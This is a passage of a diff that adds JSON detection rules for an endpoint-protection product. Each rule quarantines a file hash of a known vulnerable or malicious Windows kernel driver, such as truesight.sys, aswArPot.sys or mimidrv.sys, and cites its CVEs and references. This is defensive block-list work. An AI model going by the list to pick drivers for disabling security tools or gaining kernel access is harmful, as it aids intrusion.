+ "last_update": "2026-03-23T11:45:31.813347Z",
+ "creation_date": "2026-03-23T11:45:31.813350Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e85661eaf2d80f59a7cce8588d487eb2f3e88cdf05580872ea7a379fd512d63d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90974d7c-40f0-518d-b0d1-137b96af3a4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477348Z",
+ "creation_date": "2026-03-23T11:45:30.477351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f42eb29f5b2bcb2a70d796fd71fd1b259d5380b216ee672cf46dcdd4604b87ad",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "909ca9fb-ef0b-5a0d-a5ab-32a75da649ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498255Z",
+ "creation_date": "2026-03-23T11:45:31.498260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95647f910288a7c30a2a886254d2dcbc0d1035e5ec0e9c13bb292d2432e6329c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90a201dc-9930-5357-8265-4ff9495a155e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833754Z",
+ "creation_date": "2026-03-23T11:45:30.833757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab022e2378b4784621dbea6ede94ec67a9a68cc5e0e86e6be3d08ff90803a611",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90b2e7bd-f87c-532e-a73e-70a291ebab7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452913Z",
+ "creation_date": "2026-03-23T11:45:30.452916Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b71b7f86e41540a82d7750a698e0386b74f52962b879cbb46f17935183cd2c7",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90b4be1b-8b21-5d12-9fd3-e36511fcba11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969382Z",
+ "creation_date": "2026-03-23T11:45:29.969384Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5c8258836b58a830ef0289cdd544f741cd1054e8ae4732452553f680677825e",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90d9475e-5b4c-5fe5-8048-4c79fa5147ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811507Z",
+ "creation_date": "2026-03-23T11:45:31.811509Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6faf31cce58738989762bb173e25c7fbe1db0c65aca290e1e150aef5df5bf0e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90d98919-a2a4-5a58-b0bc-e7931420d70e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466270Z",
+ "creation_date": "2026-03-23T11:45:30.466273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90dd4aa3-65e5-55fc-9de3-2d70d07b0fb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161182Z",
+ "creation_date": "2026-03-23T11:45:31.161184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161189Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "548ae3270c01abaaa47ce523a1a1f55dcab8bcbb7e1ab2af63748117259a5fe1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90eb92d4-fb93-5280-bf5d-5ba7d643fa67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481009Z",
+ "creation_date": "2026-03-23T11:45:31.481013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4619cb7fbfa46a9eb482bf6988ee67a5720f8685d5f1a5a715cb6f250af84ace",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90f285bb-fbd5-5c7e-b17c-4bae4c69b851",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977568Z",
+ "creation_date": "2026-03-23T11:45:29.977571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4ac5c7fbb41ee988029b27d8b6be574725689fd1365f5a56f5a12d9120f86c6",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90f9224e-d2e7-5b8f-9693-87166a8ab05b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475539Z",
+ "creation_date": "2026-03-23T11:45:31.475543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7000fda0f12ed88ec7918021caed1c6d18248c31cc5e4043dff1016fe2470ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90ff1411-47c9-5655-9c0e-87cd7acc258b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473572Z",
+ "creation_date": "2026-03-23T11:45:30.473575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1375cb06b0e1ec47e3afea13824cff8f3d9d995960556c0795e9bec0fe48b70",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9101d8b1-6f1b-5c63-a79e-a72b759aef3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817417Z",
+ "creation_date": "2026-03-23T11:45:30.817419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79247cd973878500461753431f1528ed35e5f85a8978bf68ac211335ffcae27a",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "911768ca-1f42-5ed1-8237-9f524b6a8a38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815272Z",
+ "creation_date": "2026-03-23T11:45:31.815274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d93c9ff5be30340df129c7fbeab0657228adbc69a6a41ef18fa870c67896a013",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9120f31c-1796-5992-89a9-3004655bca09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475987Z",
+ "creation_date": "2026-03-23T11:45:31.475991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f3675944cb37db65ef8e924d5d38142d161b76e2895e0776669cad217594c00",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9128c603-cd3c-520a-a6b6-c37da59a15c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149075Z",
+ "creation_date": "2026-03-23T11:45:31.149077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ada6b01f7bebb33525bf3df2d7f353461a26f81aaf6fe152081ce18cb97216d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "912cd4ea-7e68-5d4a-9c23-cde44c74825f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610638Z",
+ "creation_date": "2026-03-23T11:45:29.610640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e5aef7c66c0e92dfc037ee29ade1c8484b8d7fadebdcf521d2763b1d8215126",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "912d96e9-d29e-5da1-9c60-9ee8900e5ed9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826656Z",
+ "creation_date": "2026-03-23T11:45:30.826659Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "accf1ca6cdc769088de122167fbe39ccedb7265b70a0874cfe5c74fcead44b53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9130b846-0c6d-5edc-a5c0-247819e459d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475504Z",
+ "creation_date": "2026-03-23T11:45:30.475507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0856a1da15b2b3e8999bf9fc51bbdedd4051e21fab1302e2ce766180b4931d86",
+ "comment": "Vulnerable Kernel Driver (aka Blackbone.sys) [https://www.loldrivers.io/drivers/b9b835bd-b720-424b-9160-2442bc4d6e58/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9136c9c0-7cca-52b4-a5bb-36a81995d6c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829307Z",
+ "creation_date": "2026-03-23T11:45:30.829309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829314Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b03990f69862eb3b2a43c484a46c55122ab39184423fe2dd86f656014345d48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "91372f37-1686-5019-b33b-71ad24e9e2f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487199Z",
+ "creation_date": "2026-03-23T11:45:31.487201Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487206Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d6c7f8db8ad3c06a87a909582b3d57fd2c4610dfb29dd84a682a58522baa7bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "913cf8a3-0d0a-5a10-b354-48d3861cc0da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480301Z",
+ "creation_date": "2026-03-23T11:45:31.480305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
